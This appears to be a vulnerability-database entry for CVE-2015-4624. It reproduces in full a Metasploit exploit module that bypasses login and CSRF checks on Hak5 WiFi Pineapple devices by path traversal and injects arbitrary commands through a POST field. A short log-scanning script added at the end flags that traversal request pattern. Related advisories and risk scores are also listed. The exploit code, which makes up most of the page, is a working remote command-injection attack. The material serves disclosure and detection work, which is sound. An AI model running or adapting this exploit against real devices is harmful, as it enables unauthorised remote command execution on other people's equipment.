Hak5 WiFi Pineapple Preconfiguration Command Injection

Published: 07 Sep 2016 00:22:25
Reported by: catatonicprime
Type: metasploit
Source: www.rapid7.com
Views: 31

A Metasploit exploit module is available for the WiFi Pineapple command injection vulnerability affecting versions 2.0 to 2.3.

Related

Reporter | Title | Published | Family
0day.today | Hak5 WiFi Pineapple Preconfiguration Command Injection 2 | 19 Oct 2016 00:00 | zdt
Circl | CVE-2015-4624 | 20 Oct 2016 00:00 | circl
CNVD | Hak5 WiFi Pineapple Pre-Configured Command Injection Vulnerability | 5 Apr 2017 00:00 | cnvd
CVE | CVE-2015-4624 | 31 Mar 2017 15:00 | cve
Cvelist | CVE-2015-4624 | 31 Mar 2017 15:00 | cvelist
Exploit DB | Hak5 WiFi Pineapple 2.4 - Preconfiguration Command Injection (Metasploit) | 20 Oct 2016 00:00 | exploitdb
Metasploit | Hak5 WiFi Pineapple Preconfiguration Command Injection | 7 Sep 2016 00:18 | metasploit
NVD | CVE-2015-4624 | 31 Mar 2017 16:59 | nvd
Packet Storm | WiFi Pineapple Predictable CSRF Token | 12 Aug 2015 00:00 | packetstorm
Packet Storm | Hak5 WiFi Pineapple Preconfiguration Command Injection 2 | 19 Oct 2016 00:00 | packetstorm

Code

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Hak5 WiFi Pineapple Preconfiguration Command Injection',
      'Description'    => %q{
      This module exploits a login/csrf check bypass vulnerability on WiFi Pineapples version 2.0 <= pineapple < 2.4.
      These devices may typically be identified by their SSID beacons of 'Pineapple5_....';
      Provided as part of the TospoVirus workshop at DEFCON23.
      },
      'Author'         => ['catatonicprime'],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2015-4624' ]
        ],
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Privileged'     => false,
      'Payload'        => {
        'Space'        => 2048,
        'DisableNops'  => true,
        'Compat'       =>
          {
            'PayloadType' => 'cmd',
            'RequiredCmd' => 'generic python netcat telnet'
          }
      },
      'Targets'        =>
        [
          [ 'WiFi Pineapple 2.0.0 - 2.3.0', {} ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2015-08-01'))

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'Path to the command injection', '/components/system/configuration/functions.php' ]),
        Opt::RPORT(1471),
        Opt::RHOST('172.16.42.1')
      ]
    )

    deregister_options(
      'ContextInformationFile',
      'DOMAIN',
      'DigestAuthIIS',
      'EnableContextEncoding',
      'FingerprintCheck',
      'HttpClientTimeout',
      'NTLM::SendLM',
      'NTLM::SendNTLM',
      'NTLM::SendSPN',
      'NTLM::UseLMKey',
      'NTLM::UseNTLM2_session',
      'NTLM::UseNTLMv2',
      'SSL',
      'SSLVersion',
      'VERBOSE',
      'WORKSPACE',
      'WfsDelay',
      'Proxies',
      'VHOST'
    )
  end

  def cmd_uri
    normalize_uri('includes', 'css', 'styles.php', '../../..', target_uri.path)
  end

  def cmd_inject(cmd)
    res = send_request_cgi(
      'method'     => 'POST',
      'uri'        => cmd_uri,
      'vars_get'   => {
        'execute'  => "" # Presence triggers command execution
      },
      'vars_post'  => {
        'commands' => cmd
      })
    res
  end

  def check
    res = cmd_inject("echo")
    if res && res.code == 200 && res.body =~ /Executing/
      return Exploit::CheckCode::Vulnerable
    end
    Exploit::CheckCode::Safe
  end

  def exploit
    print_status('Attempting to bypass login/csrf checks...')
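    # check returns a CheckCode object, which is always truthy, so compare explicitly
    unless check == Exploit::CheckCode::Vulnerable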
      fail_with(Failure::NoAccess, 'Failed to bypass login/csrf check...')
    end
    print_status('Executing payload...')
    cmd_inject("#{payload.encoded}")
  end
end
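
The module reaches functions.php through a path that begins at /includes/css/styles.php and climbs back with ../../.., and that request shape can be matched in HTTP logs. The following log check is an added example, not part of the Metasploit module or of Hak5's code; the access-log format, the sample lines and the helper names are assumptions, and it also covers percent-encoded dot segments, which the module itself does not use.

```ruby
# Added detection sketch; log format and sample lines are constructed.
PROTECTED_PATH = '/components/system/configuration/functions.php' # module's TARGETURI default
REQUEST_RE = /"(?<method>[A-Z]+) (?<target>\S+) HTTP\/[\d.]+"/

# Percent-decode, then collapse "." and ".." segments as a web server would.
def resolve_path(raw_path)
  decoded = raw_path.b.gsub(/%([0-9A-Fa-f]{2})/) { Regexp.last_match(1).hex.chr }
  stack = []
  decoded.split('/').each do |seg|
    next if seg.empty? || seg == '.'
    seg == '..' ? stack.pop : stack.push(seg)
  end
  '/' + stack.join('/')
end

# nil: other endpoint; :direct: canonical path; :bypass_*: non-canonical path.
def classify(method, target)
  raw_path, query = target.split('?', 2)
  resolved = resolve_path(raw_path.to_s)
  return nil unless resolved == PROTECTED_PATH
  return :direct if raw_path == resolved
  has_execute = query.to_s.split('&').any? { |kv| kv.split('=', 2).first == 'execute' }
  method == 'POST' && has_execute ? :bypass_with_execute : :bypass_path
end

# Returns [line_number, verdict] for every request that took an indirect path.
def scan(lines)
  hits = []
  lines.each_with_index do |line, idx|
    m = REQUEST_RE.match(line)
    next unless m
    verdict = classify(m[:method], m[:target])
    hits << [idx + 1, verdict] if verdict && verdict != :direct
  end
  hits
end

# Constructed sample access-log lines (the management UI listens on port 1471).
SAMPLE_LOG = [
  '172.16.42.50 - - [01/Aug/2015:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 512',
  '172.16.42.50 - - [01/Aug/2015:10:00:05 +0000] "POST /components/system/configuration/functions.php?execute= HTTP/1.1" 200 40',
  '172.16.42.77 - - [01/Aug/2015:10:01:00 +0000] "POST /includes/css/styles.php/../../../components/system/configuration/functions.php?execute= HTTP/1.1" 200 40',
  '172.16.42.77 - - [01/Aug/2015:10:01:09 +0000] "GET /includes/css/styles.php/%2e%2e/%2e%2e/%2e%2e/components/system/configuration/functions.php HTTP/1.1" 200 0'
].freeze

scan(SAMPLE_LOG).each { |line_no, verdict| puts "line #{line_no}: #{verdict}" }
```

This only works where the web server logs the request target as received; a server that logs the already-normalized path hides the dot segments.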

Scores as of 02 Oct 2020 20:00 (current):
Vulners AI Score: 0.4 (Low risk)
CVSS 2: 4.3
CVSS 3: 7.5
EPSS: 0.4762